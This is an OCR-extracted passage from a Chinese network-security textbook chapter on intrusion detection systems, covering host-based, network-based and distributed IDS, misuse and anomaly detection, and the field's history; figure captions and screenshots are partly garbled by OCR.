其 过 滤 规 则 大 多 根据 数据 包头 部 信息 或 者 服务 类 型 来 制定 ,对 数据 包 中 的 数据 部 分 没有 分 
析 功 能 ,因此 也 就 无 法 识别 穿 过 防火 墙 的 病毒 数据 。 
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各 种 内 部 网 络 一 般 采用 防火 墙 作 为 安全 的 第 一 道 防线 。 然 而 随 着 攻击 者 知识 的 日 趋 成 
熟 ,攻击 工具 与 手法 的 日 趋 复杂 多 样 ,单纯 的 防火 墙 策略 已 经 无 法 满足 对 信息 安全 高 度 敏感 
的 部 门 的 需要 ,网 络 的 防卫 必须 采用 一 种 纵深 的 多样 的 手段 。 

与 此 同时 ,当今 的 网 络 环 境 也 变 得 越 来 越 复 杂 , 各 式 各 样 的 复杂 的 设备 ,需要 不 断 升 级 、 
补漏 的 系统 使 得 网 络 管理 员 的 工作 不 断 加 重 ,不 经 意 的 疏忽 便 有 可 能 造成 安全 的 重大 隐患 。 

在 这 种 环境 下 ,入 侵 检 测 系统 应 运 而 生 , 它 可 以 弥补 防火 墙 两 个 致命 的 缺点 : 无 法 检测 
内 部 网 络 存在 的 入侵 行为 ,以 及 无 法 检测 出 不 通过 防火 墙 的 违反 安全 策略 的 行为 。 因 此 越 
来 越 受 到 人 们 的 关注 ,已 经 在 各 种 不 同 的 环境 中 发 挥 其 关键 作用 。 

如 果 把 防火 墙 比 做 一 栋 大 楼 的 门卫 ,对 每 个 进出 的 数据 包 进 行 检查 ,那么 人 侵 检测 系统 
就 像 大 楼 里 巡 逮 的 保安 ,能够 及 时 发 现 发 生 在 大 楼 内 部 的 非 授权 行为 。 


121 入 侵 检 测定 义 


入 侵 是 指 一 系列 试图 破坏 信息 资源 机 密 性 、 完 整 性 和 可 用 性 的 行为 。 

入 侵 检测 就 是 通过 从 计算 机 网 络 系统 中 的 若干 关键 结 点 收集 信息 ,并 分 析 这 些 信息 , 监 
控 网 络 中 是 否 有 违反 安全 策略 的 行为 或 者 是 否 存 在 人 侵 行为 ,是 对 指向 计算 和 网 络 资源 的 
恶意 行为 的 识别 和 响应 过 程 。 

和信 侵 检测 系统 (Intrusion Detection System,IDS) : 入 侵 检 测 是 用 于 检测 任何 损害 或 企 
图 损害 系统 的 机 密 性 、 完 整 性 或 可 用 性 等 行为 的 一 种 网 络 安全 技术 。 它 通过 监视 受 保护 系 
统 的 状态 和 活动 ,采用 异常 检测 或 滥用 检测 的 方式 ,发 现 非 授权 的 或 恶意 的 系统 及 网 络 行 
为 ,为 防范 人 侵 行为 提供 有 效 的 手段 ,是 一 个 完备 的 网 络 安全 体系 的 重要 组 成 部 分 。 

入 侵 检测 的 通用 流程 如 图 12-1 所 示 。 


-| 数据 提取 二 数据 数据 分 析 | 亚 件 结果 处 理 ~ 


12-1 入 侵 检测 流程 


图 12-1 中 ,数据 提取 模块 的 作用 在 于 为 系统 提供 数据 ,数据 的 来 源 可 以 是 主机 上 的 日 
志 信 息 、 变 动 信息 ,也 可 以 是 网 络 上 的 数据 信息 、 网 络 流量 。 数 据 提取 模块 在 获得 原始 数据 
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以 后 需要 对 其 进行 简单 的 处 理 , 如 简单 的 过 滤 .数据 格式 的 标准 化 等 ,然后 把 经 过 处 理 的 数 
据 提 交 给 数据 分 析 模 块 。 

数据 分 析 模 块 的 作用 在 于 对 数据 进行 深入 分 析 ,发 现 攻击 并 根据 分 析 的 结果 产生 事件 ， 
传递 给 结果 处 理 模 块 。 数 据 分 析 的 方式 多 种 多 样 , 可 以 是 简单 对 某 种 行为 的 计数 (如 一 定时 
间 内 某 个 特定 用 户 登录 失败 的 次 数 , 或 者 某 种 特定 类 型 报 文 的 出 现 次 数 ), 也 可 以 是 一 个 复 
杂 的 专家 系统 。 该 模块 是 一 个 人 侵 检测 系统 的 核心 ,在 人 侵 检测 方法 中 将 详细 讲述 。 

最 后 根据 事件 产生 响应 。 响 应 可 以 是 积极 主动 的 ,例如 对 入 侵 者 采取 反击 行为 ,收集 入 
侵 者 的 额外 信息 等 ; 也 可 以 是 被 动 的 ,系统 仅仅 简单 对 所 检测 到 的 入 侵 产 生 报警 或 者 文档 ， 
提醒 管理 员 注意 。 

如 果 检 测 到 入 侵 的 速度 足够 快 , 则 在 攻击 发 生 或 危及 数据 之 前 ,就 可 以 识别 出 人 侵 者 ， 
并 且 将 他 们 驱逐 ,即使 没有 非常 及 时 地 检测 到 入 侵 , 入 侵 检测 越 快 ,破坏 的 程度 也 就 越 低 。 
并 且 , 有 效 的 人 侵 检测 系统 可 以 看 成 是 阻止 人 侵 的 屏障 ,而 且 有 威慑 作用 。 

另外 ,入侵 检测 系统 的 功能 还 包括 

(1) 识别 黑客 的 常用 入 侵 与 攻击 手段 。 入 侵 检测 技术 通过 分 析 各 种 攻击 的 特征 ,可 以 
全 面 快速 地 识别 探测 攻击 .拒绝 服务 攻击 、 缓 冲 区 溢出 攻击 .电子 邮件 攻击 ` 浏 览 器 攻击 等 各 
种 常用 攻击 手段 ,并 做 出 相应 的 防范 。 一 般 来 说 ,黑客 在 进行 人 侵 的 第 一 步 探测 .收集 网 络 
及 系统 信息 时 ,就 会 被 IDS 捕获 ,向 管理 员 发 出 警告 。 

(2) 监控 网 络 异 常 通信 。IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ,保证 网 络 
通信 的 合法 性 ,任何 不 符合 网 络 安全 策略 的 网 络 数据 都 会 被 IDS 监测 到 并 警告 。 

(3) 鉴别 对 系统 漏洞 及 后 门 的 利用 。IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ， 
通过 对 网 络 数据 包 连 接 的 方式 .连接 端口 以 及 连接 中 特定 的 内 容 等 特征 分 析 , 可 以 有 效 地 发 
现 网 络 通信 中 针对 系统 漏洞 进行 的 非法 行为 。 

(4) 完善 网 络 安全 管理 。IDS 通过 对 攻击 或 人 侵 的 检测 及 反应 ,可 以 有 效 地 发 现 和 防 
止 大 部 分 的 网 络 犯罪 行为 ,给 网 络 安 全 管理 提供 了 一 个 集中 、 方 便 、 有 效 的 工具 。 使 用 IDS 
系统 的 监测 ,统计 分 析 、 报 表 功 能 ,可 以 进一步 完善 网 络 管理 。 


122 入 侵 检 测 系 统 分 类 


在 人 侵 检 测 系统 中 ,根据 系统 数据 来 源 的 不 同 , 可 将 入 侵 检 测 系 统 分 成 三 类 : 基于 主机 
的 人 侵 检 测 系统 、 基 于 网 络 的 人 侵 检测 系统 和 分 布 式 人 侵 检测 系统 。 


1221 基于 主机 的 入 侵 检 测 系 统 


基于 主机 的 入 侵 检测 系统 (Host-based IDS, HIDS) 出 现在 20 世纪 80 年 代 初 期 , 那 时 
网 络 还 没有 今天 这 样 普 及 和 复杂 ,而 且 网 络 之 间 也 没有 完全 连通 。 在 这 种 比较 简单 的 环境 
中 ,网 络 管理 员 通 过 检查 审计 日 志 来 发 现 可 疑 行 为 。 现 在 基于 主机 的 人 侵 检测 系统 仍 使 用 
审计 日 志 的 方法 ,但 自动 化 程度 大 大 提高 ,并 发 展 到 精密 的 和 迅速 响应 的 检测 技术 。 

基于 主机 的 人 侵 检测 系统 通常 被 安装 在 被 保护 的 主机 上 ,对 该 主机 的 网 络 实时 连接 以 
及 系统 审计 日 志 进 行 分 析 和 检查 , 当 发 现 可 疑 行为 和 安全 违规 事件 时 ,系统 就 会 向 管理 员 报 
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警 , 以 便 采取 措施 。 这 些 受 保护 的 主机 可 以 是 Web 服务 器 .邮件 服务 器 .DNS 服务 器 等 关 
键 主机 设备 。 

HIDS 考察 若干 日 志文 件 (内 核 、 系 统 、 服 务 器 、 网 络 、 防 火 墙 等 ), 并 拿 日 志文 件 和 常见 
已 知 攻 击 的 内 部 数据 库 进行 比较 。 

Windows 有 自 带 的 日 志 系 统 ,例如 Windows XP 的 日 志文 件 可 以 通过 “事件 查看 器 ”来 
进行 查阅 。 应 用 程序 日 志 、 安 全 日 志 、 系 统 日 志 .DNS 日 志 默认 情况 下 都 位 于 C:\WINNT\ 
system32\config 文件 夹 中 ,以 . Evt 做 文件 扩展 名 ,还 有 一 部 分 存放 在 C:\Windows 目录 
下 ,以 . log 为 文件 扩展 名 。 如 图 12-2 所 示 是 在 config 文件 夹 中 日 志文 件 的 列表 。 


CDT = 名 |x| 
文件 E) 编辑 (E) 查看 收 亮 (的 工具 (1) 帮助 t) | 中 
[ET 
地 址 (9) | 局 cywInpowstsystemaztcong 可 轩辕 到 | 凡 
和 名称 | 大 本 | 类 型 [eax 
文件 和 文件 夹 任务 Csystemprofie 文件 严 2008-7-] 
国 AppEvent.Ewt 512KB EvT 文 件 2008-8-] 
入 放 于 = 人 半天 到 defaut 256KB 文件 2008-8-1| 
© TR 国 92KB SAY 文 件 2008-7-3 
oDiag.evt 64KB EVT 文 件 2008-6-] 
加 共 过 文人 图 osesson.ewt 64KB EYT 文 件 2008-8-]| 
到 sam 256KB 文件 2008-6-| 
其 它 位 置 secEventew 64KB EVT 文 件 2008-7-] 
图 5EcuRITY 256KB 文件 2008-8-]| 
BB system32 国 software 13,056KB 文件 2008-8-]| 
加 我 的 文档 国 software.sav 628KB 5AY 文 件 2008-7-d 
启 共享 文档 国 5ysEvent.Ewt 192KB EVT 文 件 2008-6-] 
好 我 的 电 议 国 system 2,816KB 文件 2008-6-| 
- 国 system.sav 416KB SAV 文 件 2008-7 
和 国 userdff 256KB 文件 2008-7-4 


图 12-2 config 文件 夹 中 的 日 志文 件 列 表 


UNIX 系统 采用 Syslog 工具 来 实现 日 志 功 能 。 如 果 配 置 正确 ,主机 上 发 生 的 所 有 事情 
都 会 被 记录 下 来 。 而 这 些 数 据 , 则 可 以 作为 基于 主机 的 入 侵 检 测 系统 的 数据 来 源 。 

另外 ,HIDS 还 可 以 使 用 防火 墙 等 其 他 安全 工具 的 日 志 系 统 。 

图 12-3 显示 了 一 个 在 一 些 服务 器 和 个 人 计算 机 上 安装 了 HIDS 的 网 络 。 安 装 在 邮件 
服务 器 上 的 HIDS 可 以 主要 只 设置 和 邮件 服务 器 相关 的 规则 ,使 其 免 受 入 侵 ; 安装 在 Web 
服务 器 上 的 IDS 则 主要 设置 和 Web 服务 相关 的 规则 。 

目前 ,多 数 网 络 攻击 的 目标 是 DNS、E-mail 和 Web 服务 器 ,大 约 占 全 部 网 络 攻 击 事件 
的 1/3 以 上 。 这 些 服务 器 必须 与 Internet 互联 ,所 以 在 各 服务 器 上 应 当 安装 基于 主机 的 人 
侵 检 测 系统 ,并 将 检测 结果 及 时 向 管理 员 报告 。 基 于 主机 的 入 侵 检 测 系统 没有 带宽 的 限制 ， 
它 密 切 监视 系统 日 志 , 能 识别 运行 代理 的 机 器 上 受到 的 攻击 。 基 于 主机 的 系统 提供 了 基于 
网 络 系统 所 不 能 提供 的 精细 功能 ,包括 二 进 制 完整 性 检查 .系统 日 志 分 析 和 非法 进程 关闭 的 
功能 ,并 能 根据 受 保护 站 点 的 实际 情况 进行 针对 性 的 定制 ,使 其 工作 非常 有 效率 , 误 警 率 非 
常 低 。 例 如 , Web 服务 器 人 侵 检测 系统 相当 于 一 套 复杂 的 过 滤 设 备 , 使 用 一 个 攻击 字符 串 
列表 来 对 Web 服务 器 进行 监视 ,可 以 发 现 对 Web 服务 器 的 已 知 的 各 种 可 能 的 攻击 。 这 样 
的 人 侵 检测 系统 在 工作 时 ,即使 有 一 些 误 警 事件 也 影响 不 大 ,因为 这 样 可 以 通告 管理 员 在 
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FTP 服 务 器 邮件 服务 器 
HIDS 


Web 服 务 器 DNS 服务 器 
HIDS 


HIDS 工作 站 工作 站 HIDS 工作 站 


12-3 HIDS 在 网 络 中 的 部 署 


Web 服务 器 上 运行 了 哪些 具有 脆弱 性 的 服务 ,从 而 采取 打 补 丁 或 升级 应 用 程序 的 对 策 。 

当然 ,HIDS 也 有 其 弱点 和 无 法 检测 的 盲点 。 首 先 ,HIDS 的 检测 效果 取决 于 涉及 数据 
或 系统 日 志 的 准确 性 和 完整 性 以 及 安全 事件 的 定义 ,入 侵 者 可 以 通过 使 用 某 些 系统 特权 或 
调用 比 审计 本 身 更 低级 的 操作 来 逃避 审计 。 另 外 ,HIDS 并 不 能 检测 众多 基于 网 络 的 攻击 ， 
例如 域名 欺骗 .端口 扫描 等 。 同 时 ,基于 主机 的 人 侵 检测 系统 由 于 安装 并 运行 于 主机 上 ,或 
多 或 少 地 会 影响 主机 的 性 能 。 所 以 ,单独 地 依靠 主机 审计 信息 进行 入侵 检测 难以 适应 网 络 
安全 的 需求 。 
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基于 网 络 的 入 侵 检测 系统 (Network-based IDS,NIDS) 一 般 安装 在 需要 保护 的 网 段 中 ， 
实时 监视 网 段 中 传输 的 各 种 数据 包 , 并 对 这 些 数 据 包 进 行 分 析 和 检测 。 如 果 发 现 人 侵 行为 
或 可 疑 事件 ,入 侵 检 测 系统 就 会 发 出 警报 甚至 切断 网 络 连接 。 它 的 工作 层面 是 在 路 由 器 或 
主机 级 别 扫描 网 络 分 组 、 审 查分 组 信息 ,并 在 一 个 特殊 文件 中 详细 记录 可 疑 分 组 。 根 据 这 些 
可 疑 分 组 ,基于 网 络 的 IDS 可 以 扫描 它 自己 的 已 知 网 络 攻 击 特征 数据 库 , 并 为 每 个 分 组 指 
定 严 重 级 别 。 如 果 严 重 级 别 足够 高 , 它 就 会 给 安全 组 的 成 员 发 送 警 告 信息 ,因此 安全 组 的 成 
员 就 可 以 进一步 调查 这 些 异 常 特点 。 

多 数 基于 网 络 的 IDS 的 数据 收集 部 分 是 一 个 嗅 探 器 ,用 来 嗅 探 网 络 上 传输 的 数据 ,一 
般 是 把 安装 了 NIDS 的 主机 网 卡 设 置 为 混杂 (Promiscuous) 模 式 ,该 模式 允许 设备 捕捉 每 个 
经 过 网 络 的 数据 包 。 混 杂 模 式 可 以 通过 ifconfig 命令 来 设置 ,如 ifconfig eth0 promisc, 或 者 
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通过 专门 的 函数 接口 来 设置 。 

基于 网 络 的 人 侵 检 测 系统 如 同 网 络 中 的 摄像 机 ,只 要 在 一 个 网 络 中 安放 一 台 或 多 台 入 
侵 检测 引擎 (如 图 12-4 所 示 ) ,就 可 以 监视 整个 网 络 的 运行 情况 ,在 黑客 攻击 造成 破坏 之 前 ， 
预先 发 出 警报 。 


Internet 


NIDS NIDS 


Web 上 服务 器 Web 服 务 器 Web 服 务 器 DNS 服务 器 


< 划 NIDS 
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工作 站 C 作 站 工作 站 
图 12-4 NIDS 在 网 络 中 的 部 署 


图 12-4 中 的 这 个 网 络 使 用 了 三 个 NIDS, 这 些 IDS 都 被 放 在 网 络 最 关键 的 地 方 ,能 监视 
到 关键 部 位 所 有 设备 的 网 络 通信 。 这 是 一 个 典型 的 基于 NIDS 的 网 络 保护 方案 拓扑 图 , 提 
供 公共 服务 的 服务 器 子 网 如 果 被 人 侵 ,这 人 台 服 务 器 会 变 成 一 个 跳板 来 攻击 整个 子 网 ,所 以 要 
被 NIDS 保护 。 内 网 中 的 工作 站 被 另 一 个 IDS 保护 ,这 样 可 以 减少 内 网 主机 被 入 侵 的 危险 ， 
在 网 络 中 布置 多 个 NIDS 是 深层 安全 防护 的 一 个 很 好 的 应 用 。 

基于 网 络 的 人 侵 检测 系统 的 优点 在 于 , 它 的 检测 范围 是 整个 网 段 ,而 不 仅仅 是 保护 主 
机 , 它 的 防护 和 检测 是 实时 的 ,一 旦 发 生 恶意 访问 或 攻击 ,基于 网 络 的 入侵 检测 系统 就 可 以 
随时 发 现 ,因此 能 够 更 快 地 做 出 反应 ,将 入 侵 活动 对 系统 的 破坏 减 到 最 低 。 由 于 不 需要 在 每 
台 主 机 上 安装 基于 网 络 的 人 侵 检测 系统 ,所 以 它 不 容易 被 攻击 者 发 现 , 它 甚至 可 以 没有 网 络 
地 址 ,而 神秘 地 隐藏 在 幕后 ,这 对 许多 网 络 内 部 的 攻击 者 是 一 种 很 大 的 威慑 (普遍 认为 ,50% 
以 上 的 网 络 攻击 都 来 自 网 络 内 部 )。 另 外 ,NIDS 不 需要 任何 特殊 的 审计 和 登录 机 制 ,只 要 
配备 网 络 接口 即 可 ,不 会 影响 其 他 数据 源 。 随 着 互联 网 在 其 范围 和 通信 流量 方面 的 增 大 , 基 
于 网 络 的 IDS 已 经 越 来 越 受 欢迎 。 在 安全 行业 中 ,能 够 扫描 大 量 网 络 活动 并 成 功 地 标记 可 
疑 传 输 的 IDS 很 受 好 评 。 

NIDS 的 主要 不 足 之 处 在 于 只 能 检测 经 过 本 网 络 的 活动 ,并 且 精 确 度 较 差 ,在 交换 式 网 
络 环境 下 难以 配置 , 防 和 人 侵 欺骗 能 力 较 差 。 而 且 无 法 知道 主机 内 部 的 安全 情况 ,主机 内 部 普 
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通用 户 的 威胁 也 是 网 络 信息 系统 安全 的 重要 组 成 部 分 。 另 外 ,如 果 数 据 流 进 行 了 加 密 ， 
NIDS 也 不 能 有 效 审 查 其 内 容 , 对 主机 上 执行 的 命令 也 就 难以 检测 。 因 此 ,NIDS 和 HIDS 
在 方法 上 是 互补 的 ,并 且 在 抵制 人 侵 的 不 同 阶段 发 挥 不 同 的 作用 。 
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随 着 网 络 系统 结构 的 复杂 化 和 大 型 化 ,出 现 了 许多 新 的 问题 。 其 一 ,系统 的 弱点 或 漏洞 
分 散在 网 络 中 的 各 个 主机 上 ,这 些 弱点 有 可 能 被 人 侵 者 用 来 攻击 网 络 ,而 仅 依靠 一 个 主机 或 
网 络 的 入侵 检测 系统 很 难 发 现 人 侵 行为 ; 其 二 ,入 侵 行为 不 再 是 单一 的 行为 ,而 是 表现 出 相 
互 协 作 入 侵 的 特点 ,例如 分 布 式 拒绝 服务 攻击 ; 其 三 ,入 侵 检 测 所 依靠 的 数据 来 源 分 散 化 ， 
使 得 收集 原始 的 检测 数据 变 得 比较 困难 ,例如 监听 交换 型 网 络 的 网 络 数 据 包 功 能 受到 限制 ; 
另外 ,网 络 速度 传输 加 快 ,网 络 流量 大 ,原始 数据 的 集中 处 理 方式 往往 造成 检测 瓶颈 ,从 而 导 
致 漏 检 。 基 于 这 种 情况 ,分 布 式 人 侵 检测 系统 应 运 而 生 。 

分 布 式 人 侵 检测 系统 (Distributed IDS,DIDS) 的 目标 是 既 能 检测 网 络 人 侵 行为 ,又 能 
检测 主机 的 入 侵 行 为 。 系 统 通 常 由 数据 采集 模块 .通信 传输 模块 .人 侵 检测 分 析 模 块 、 响 应 
处 理 模 块 管理 中 心 模块 等 组 成 。 这 些 模 块 可 根据 不 同情 况 进 行 组 合 。 也 可 以 简单 地 把 
DIDS 理解 成 由 HIDS( 主 机 检测 引擎 )、NIDS( 网 络 检测 引擎 ) 以 及 一 个 中 央 管 理 平台 构成 。 
事实 上 ,入 侵 检测 产品 的 商家 也 是 把 这 些 组 件 根据 网 络 安全 的 实际 情况 分 别 计价 出 售 的 , 例 
如 ,一 个 网 络 中 通常 部 署 一 个 管理 中 心 .若干 个 主机 检测 引擎 和 若干 个 网 络 检测 引擎 。 其 中 
网 络 检测 引擎 作为 探测 器 放置 在 网 络 中 监测 其 所 在 网 段 上 的 数据 流 , 它 根据 集中 安全 管理 
中 心 制定 的 安全 策略 .响应 规则 等 来 分 析 检 测 网 络 数据 ,同时 向 集中 安全 管理 中 心 发 回 安全 
事件 信息 ; 主机 检测 引擎 安装 在 重要 服务 器 上 ,对 主机 进行 实时 审计 ,主机 审计 数据 也 定时 
的 传送 到 管理 平台 并 保存 在 中 央 数 据 库 中 。 管 理 平台 通过 综合 信息 来 确定 入 侵 事 件 、 制 定 
相应 策略 ; 集中 安全 管理 中 心 是 整个 分 布 式 人 侵 检测 系统 面向 用 户 的 界面 。 它 的 特点 是 对 
数据 保护 的 范围 比较 大 ,但 对 网 络 流量 有 一 定 的 影响 。 

图 12-5 显示 了 分 布 式 人 侵 检测 系统 在 网 络 中 的 部 署 结构 。 我 们 可 以 看 到 DIDS 包括 
了 四 个 探测 器 和 一 个 中 央 管 理 平 台 ,探测 器 1 和 探测 器 2 保护 着 提供 公共 服务 的 服务 器 。 
探测 器 3 和 探测 器 4 在 和 信任 的 网 络 区 域 中 保护 着 里 面 的 计算 机 。 

在 DIDS 研究 方面 ,美国 国防 高 级 研究 计划 署 (The Defense Advanced Research 
Projects Agency,DARPA) 和 互联 网 工程 任务 组 (Internet Engineering Task Force,IETF) 
的 入 侵 检 测 工 作 组 (Intrusion Detection Working Group,IDWG) 提 出 了 公共 入 侵 检 测 框架 
(Common Intrusion Detection Framework,CIDF),CIDF 已 成 为 人 侵 检测 领域 最 有 影响 力 
的 建议 。 美国 普度 大 学 安全 研究 中 心 (The Center for Education and Research in 
Information Assurance and Security,CERIAS) 则 提出 了 基于 主体 入 侵 检测 系统 ,其 主要 方 
法 是 采用 相互 独立 运行 的 进程 组 ( 称 为 自治 主体 Agent) 分 别 负 责 入 侵 检测 ,最 后 将 结果 传 
送 到 检测 中 心 。 
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图 12-5 DIDS 在 网 络 中 的 部 署 
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入 侵 检测 系统 中 最 重要 的 组 成 部 分 为 数据 分 析 模 块 , 即 入 侵 检测 所 采用 的 方法 。 无 论 
基于 网 络 还 是 基于 主机 的 入 侵 检 测 系统 ,它们 所 采用 的 检测 方法 可 以 分 为 两 种 , 即 滥用 检测 
(Misuse Detection) 方 法 与 异常 检测 (Anomaly Detection) 方 法 。 


1. 滥用 检测 


滥用 检测 也 被 称 为 误 用 检测 或 者 基于 特征 的 检测 。 这 种 方法 首先 直接 对 入 侵 行 为 进行 
特征 化 描述 ,建立 某 种 或 某 类 入 侵 特征 行为 的 模式 ,如 果 发 现 当 前 行为 与 某 个 人 侵 模式 一 
致 ,就 表示 发 生 了 这 种 入 侵 。 它 的 难点 在 于 如 何 设计 模式 ,使 其 既 表 达 入 侵 又 不 会 将 正常 模 
式 包 括 进 来 。 滥 用 检测 方法 的 基本 流程 如 图 12-6 所 示 。 

这 种 方法 由 于 依据 具体 特征 库 进 行 判断 ,所 以 检测 准确 度 很 高 ,并 且 因 为 检测 结果 有 明 
确 的 参照 ,为 系统 管理 员 做 出 相应 措施 提供 了 方便 。 这 种 检测 方式 和 防 病毒 软件 很 相似 , 行 
为 特征 库 类 似 于 防 病毒 软件 中 的 病毒 库 。 目 前 商用 的 入 侵 检测 系统 都 是 采用 的 这 种 检测 
方法 。 
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审计 数据 
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如 果 系统 错误 地 将 正常 活动 定义 为 人 侵 , 称 为 错 报 ,也 称 为 误 报 ; 如 果 系 统 未 能 检测 出 
真正 的 人 侵 行为 , 则 称 为 漏 报 。 这 是 衡量 入 侵 检测 系统 很 重要 的 两 个 指标 。 滥 用 检测 方法 
误 报 率 少 ,但 漏 报 率 较 高 。 它 的 特征 库 中 只 存储 了 当前 已 知 的 攻击 模式 和 系统 脆弱 性 ,无 法 
发 现 新 的 攻击 形式 。 因 此 ,目前 的 研究 主要 集中 在 异常 检测 方法 上 。 


2. 异常 检测 


异常 检测 方法 主要 来 源 于 这 样 的 思想 : 任何 人 的 正常 行为 都 是 有 一 定 规律 的 ,并 且 可 
以 通过 分 析 这 些 行为 产生 的 日 志 信 息 ( 假 定 日 志 信 息 足 够 完全 ) 总 结 出 一 些 规律 ,而 入侵 和 
滥用 行为 则 通常 与 正常 行为 会 有 比较 大 的 差异 ,通过 检查 出 这 些 差异 就 可 以 检测 出 入 侵 。 

这 样 ,为 正常 行为 建立 一 个 规则 集 , 称 为 正常 行为 模式 或 正常 轮廓 (normal profile) ,也 
被 称 为 "用户 轮 廓 ”, 当 用 户 活动 和 正常 轮廓 有 较 大 偏离 的 时 候 认为 异常 或 入 侵 行为 。 这 样 
能 够 检测 出 非法 的 入 侵 行为 甚至 是 通过 未 知 攻击 方法 进行 的 入 侵 行 为 ,此 外 不 属于 入 侵 的 
异常 用 户 行为 (滥用 自己 的 权限 ) 也 能 被 检测 到 。 

异常 检测 的 效率 取决 于 用 户 轮廓 的 完备 性 和 监控 的 频率 ,因而 能 检测 未 知 的 入侵 。 同 
时 系统 能 针对 用 户 行为 的 改变 进行 自我 调整 和 优化 。 它 的 难点 在 于 用 户 轮廓 的 建立 以 及 如 
何 比较 用 户 轮廓 和 审计 数据 。 

异常 检测 方法 的 基本 流程 如 图 12-7 所 示 。 


审计 数据 


12-7 采用 异常 检测 方法 的 数据 分 析 模 块 


相对 于 滥用 检测 方法 ,异常 检测 方法 需要 更 强 的 智能 性 ,目前 对 异常 检测 方法 的 研究 已 
经 有 很 多 。Land 和 Brodley 在 1997 年 提出 用 机 器 学 习 的 方法 建立 异常 检测 模型 , Wenke 
Lee、Stofle 等 人 在 1998 年 提出 利用 数据 挖掘 技术 来 分 析 网 络 数据 包 的 特征 并 以 此 来 建立 
异常 检测 模型 等 。 

从 20 世纪 90 年 代 至 今 ,对 入 侵 检测 系统 的 研究 呈现 出 百家争鸣 的 繁荣 局 面 ,并 在 智能 
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化 和 分 布 式 两 个 方向 取得 了 长 足 的 进展 。 目 前 ,美国 斯 坦 福 研 究 院 的 计算 机 科学 实验 室 
(Computer Science Laboratory of Stanford Research Institute, SRL/CSL) \ 普 渡 大 学 、 加 州 
大 学 戴 维 斯 分 校 洛 斯 阿拉 英 斯 国家 实验 室 、 哥 伦比 亚 大 学 、 新 墨西哥 大 学 等 机 构 在 这 些 方 
面 的 研究 代表 了 当前 的 最 高 水 平 。 

目前 采用 该 方法 的 检测 系统 由 于 在 建立 正常 行为 模式 上 还 有 许多 不 完善 之 处 ,导致 其 
有 误 报 率 较 高 的 问题 。 但 由 于 这 种 检测 方式 可 以 检测 到 未 知 的 入侵 ,这 对 于 一 个 大 型 的 、 具 
有 较 高 安全 级 别 需求 的 网 络 是 非常 重要 的 ,所 以 从 20 世纪 90 年 代 中 期 发 展 以 来 一 直 受 到 
人 们 的 关注 。 
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入侵 检测 在 信息 安全 领域 是 一 个 相对 “年 轻 ” 的 组 成 部 分 ,但 其 发 展 是 十 分 迅速 的 ,大 致 
可 分 为 以 下 几 个 阶段 。 


1. 概念 诞生 阶段 


1980 年 4 月 ,James P. Anderson 为 美国 空军 做 了 一 份 题 为 (Computer Security Threat 
Monitoring and Surveillance》( 计 算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 ,第 一 次 详细 阐述 
了 入 侵 检 测 的 概念 。 他 提出 了 一 种 对 计算 机 系统 风险 和 威胁 的 分 类 方法 ,并 将 威胁 分 为 外 
部 渗透 ,内 部 渗透 和 不 法 行为 三 种 ,同时 还 提出 了 利用 审计 跟踪 数据 监视 入 侵 活动 的 思想 。 
由 于 在 该 文中 第 一 次 提 到 了 入 侵 检测 这 一 术语 ,这 份 报告 因此 被 公认 为 是 入 侵 检测 的 开山 
之 作 。 但 此 时 的 入侵 检测 仅仅 是 一 个 概念 ,而 没有 实质 性 的 模型 出 现 。 


2. 模型 的 产生 


从 1984 年 到 1986 年 ,美国 乔治 敦 大 学 的 Dorothy Denning 和 SRI/CSL(SRI 公司 计算 
机 科学 实验 室 ) 的 Peter Neumann 研究 出 了 一 个 实时 入 侵 检 测 系统 模型 , 取 名 为 IDES( 入 
侵 检 测 专 家 系统 )。 该 模型 由 六 个 部 分 组 成 : 主体 ,对象 .审计 记录 、 轮 廓 特征 .异常 记录 、 活 
动 规则 。 它 独立 于 特定 的 系统 平台 应 用 环境 .系统 弱点 以 及 人 侵 类 型 ,为 构建 入侵 检 测 系 
统 提供 了 一 个 通用 的 框架 。 


3. 模型 的 发 展 


1988 年 ,SRI/CSL 的 Teresa Lunt 等 人 改进 了 Denning 的 和 人 侵 检测 模型 ,并 开发 出 了 
一 个 IDES。 该 系统 包括 一 个 异常 检测 器 和 一 个 专家 系统 ,分 别 用 于 统计 异常 模型 的 建立 和 
基于 规则 的 特征 分 析 检 测 。IDES 模型 基于 这 样 的 假设 : 有 可 能 建立 一 个 框架 来 描述 发 生 
在 主体 (通常 是 用 户 ) 和 客体 (通常 是 文件 ,程序 或 设备 ) 之 间 的 正常 的 交互 作用 。 这 个 框架 
由 一 个 使 用 规则 库 ( 规 则 库 描 述 了 已 知 的 违例 行为 ) 的 专家 系统 支持 。 这 能 防止 使 用 者 逐渐 
训练 (误导 ) 系 统 把 非法 的 行为 当成 正常 的 来 接受 ,也 就 是 说 让 系统 “见怪 不 怪 ”。 这 个 系统 
用 于 检测 单一 主机 的 入 侵 尝 试 ,提出 了 与 系统 平台 无 关 的 实时 检测 思想 。 在 这 一 时 期 ,1988 
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年 的 Morris 蠕虫 事件 促进 了 更 多 关于 IDS 的 开发 与 研究 。 
4. 基于 网 络 的 入 侵 检 测 系 统 的 产生 


在 很 长 一 段 时 间 里 ,IDS 系统 都 是 依靠 受 保护 主机 来 收集 审计 数据 ,在 此 基础 上 进行 监 
测 和 分 析 , 它 的 监测 目标 主要 是 主机 系统 和 本 地 用 户 ,系统 一 般 运行 在 受 保护 的 主机 上 , 依 
赖 于 审计 数据 和 系统 日 志 的 完整 性 和 准确 性 ,以 及 对 安全 事件 的 定义 。 假 如 入 侵 者 设法 逃 
避 审 计 或 者 修改 日 志 , 这 种 系统 的 弱点 就 暴露 出 来 了 。 而 且 在 现 有 的 网 络 环境 下 ,单独 地 依 
靠 主 机 审计 信息 无 法 满足 网 络 安全 的 需要 。 直 到 1990 年 ,加 州 大 学 戴 维 斯 分 校 开 发 的 网 络 
系统 监控 器 一 -NSM(CThe Network System Monitor) 改 变 了 这 个 状况 。NSM 是 入 侵 检 测 
技术 发 展 史上 继 IDES 之 后 的 又 一 个 里 程 碑 。 它 监控 以 太 网 段 上 的 网 络 流量 ,并 把 它 作 为 
分 析 的 主要 数据 源 。 从 当时 的 检测 报告 上 来 看 ,NSM 检测 了 超过 100 000 个 网 络 连 接 ,并 
从 中 识别 出 超过 300 个 人 侵 。 今 天 ,大 部 分 商业 IDS 系统 直接 使 用 从 网 络 探测 的 数据 作为 
它们 主要 的 、 其 至 是 唯一 的 数据 源 。 


